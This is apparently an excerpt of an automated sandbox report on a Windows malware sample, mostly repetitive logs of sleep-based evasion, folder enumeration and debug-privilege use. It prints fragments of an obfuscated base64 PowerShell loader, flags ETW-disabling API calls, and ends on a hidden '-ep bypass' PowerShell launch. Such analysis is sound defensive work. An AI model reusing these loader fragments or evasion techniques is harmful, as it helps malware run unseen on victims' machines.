                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5853Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3848Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: foregroundWindowGot 1746Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5159
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3865
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5226
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2800
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3485
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4541
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4168
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2522
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5373
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1587
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5721
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3992
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4270
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3587
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2649
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3486
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3318
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2279
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3429
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI coverage: 8.4 %
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4572Thread sleep count: 5853 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep count: 3848 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2572Thread sleep count: 5159 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4380Thread sleep count: 3865 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5396Thread sleep time: -12912720851596678s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4180Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5944Thread sleep count: 5226 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6928Thread sleep count: 2800 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep time: -12912720851596678s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4700Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5944Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388Thread sleep count: 3485 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388Thread sleep count: 4541 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep time: -11068046444225724s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2368Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5484Thread sleep count: 4168 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5368Thread sleep time: -10145709240540247s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4700Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5484Thread sleep count: 2522 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5704Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736Thread sleep count: 5373 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4936Thread sleep time: -9223372036854770s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5320Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep count: 1587 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6752Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136Thread sleep count: 5721 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5724Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6956Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6080Thread sleep count: 3992 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1876Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep count: 4270 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3108Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1864Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2556Thread sleep count: 3587 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3888Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2008Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304Thread sleep count: 2810 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1184Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6728Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3156Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5272Thread sleep count: 2649 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2124Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5096Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5048Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep count: 3486 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1832Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3316Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3480Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5516Thread sleep count: 3318 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4252Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1612Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3832Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep count: 2279 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4696Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep count: 3429 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 716Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 716Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: powershell.exe, 00000037.00000002.3021043364.000000000859D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QtNJlqfozVQxzNOdPhAgZNAqdcNWyMgVn2YQ7yDlyVIzk2d7od9oH6kxQTxohTSXGsdkRZCyCPU+S+SOJcpnEqFEM+eZTBZ9nqNtbK8JI56m2V87CeK+Oc/UtH1zRIBwZtadQ8PPvrQ75Rik60scdiYGkRMH35wsdWc8KfF7yE2MbKuFC3wUqQH6uY0ox7RonhHzty9GfhuvrduCqoYsqPMy1jdyPxVU3sFI2C9SJilaKgDpW8e4mLxIFrMFHl31x2wxGcWR4u6pi5s/CrEwEEt34TYzP5+cF2Z25sZA76T06x0L0o4rhgfs2iY+UkIJRY7mBnP1il2lv8H6Aeuc8nBorKBeVXcMEZmPtHSm0F9pwPsYj9r6SCHKruBT7Ikrcg0n75u9EAW0WhOGBDdrjYxLtZKSejktPeg+pUUHHdbfVdSP+YnLecJ1tT8BJgzp+EyuH4lHcgm+5JQs3KvbwABULKbM4lgGrh8ZRI2DbRwSAycvdhvzkZ8j62nFw4PkLSOT5WFvBzwGnuKhlq1zxZlRf/PWo2NT
                Source: powershell.exe, 0000002C.00000002.2496734270.00000000076B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                Source: powershell.exe, 00000016.00000002.1818907965.0000000008089000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yE2MbKuFC3wUqQH6uY0ox7RonhHzty9GfhuvrduCqoYsqPMy1jdyPxVU3sFI2C9SJilaKgDpW8e4mLxIFrMFHl31x2wxGcWR4u6pi5s/CrEwEEt34TYzP5+cF2Z25sZA76T06x0L0o4rhgfs2iY+UkIJRY7mBnP1il2lv8H6Aeuc8nBorKBeVXcMEZmPtHSm0F9pwPsYj9r6SCHKo+
                Source: powershell.exe, 0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CrEwEEt34TYzP5+cF2Z25sZA76T06x0L0o4rhgfs2iY+UkIJRY7mBnP1il2lv8H6Aeuc8nBorKBeVXcMEZmPtHSm0F9pwPsYj9r6SCHKruBT7Ikr
                Source: powershell.exe, 00000016.00000002.1812266786.0000000006DB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRd^a
                Source: powershell.exe, 00000031.00000002.2734302476.00000000072F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk%
                Source: powershell.exe, 0000003C.00000002.3248272097.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKT
                Source: powershell.exe, 0000000A.00000002.1657990410.00000000072EA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1961674745.0000000007774000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2130722447.0000000007AC5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2298217232.00000000079C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2979667593.00000000072DD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.3763309008.00000000077AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.4039348848.000000000705E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_15-34070
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.csReference to suspicious API methods: LoadLibrary("ntdll.dll")
                Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.csReference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
                Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
                Bypasses PowerShell execution policy
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command 